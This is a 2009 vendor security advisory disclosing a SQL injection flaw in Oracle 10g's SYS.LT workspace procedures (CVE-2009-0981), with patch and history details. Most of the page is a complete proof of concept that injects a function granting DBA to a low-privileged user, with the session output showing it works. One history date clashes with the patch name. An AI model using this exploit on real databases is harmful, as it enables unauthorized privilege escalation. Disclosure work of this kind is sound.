Services
Information
Company |
Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
Details The COMPRESSWORKSPACETREE procedure is owned by SYS or by WMSYS (depending on the Oracle version), one user can call this procedure with malicious code and execute PL/SQL statements and elevate the privileges as the user were the package owner. Example Example written from Alexandr "Sh2kerr" Polyakov SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- OUTLN CONNECT NO YES NO OUTLN RESOURCE NO YES NO SQL> CREATE OR REPLACE FUNCTION X return varchar2 2 authid current_user as 3 pragma autonomous_transaction; 4 BEGIN 5 EXECUTE IMMEDIATE 'GRANT DBA TO OUTLN'; 6 COMMIT; 7 RETURN 'x'; 8 END; 9 / Function created. SQL> exec SYS.LT.CREATEWORKSPACE('zz'' and outln.X()=''x') PL/SQL procedure successfully completed. SQL> exec SYS.LT.REMOVEWORKSPACE('zz'' and outln.X()=''x') PL/SQL procedure successfully completed. SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- OUTLN CONNECT NO YES NO OUTLN DBA NO YES NO OUTLN RESOURCE NO YES NO Patch Information Apply the latest Oracle Security patches (e.g. CPU April 2009 ) History 13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] 14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] 14-apr-2009 Advisory published © 2009 by Red-Database-Security GmbH - last update 19-jun-2009 |
Definition Exploit |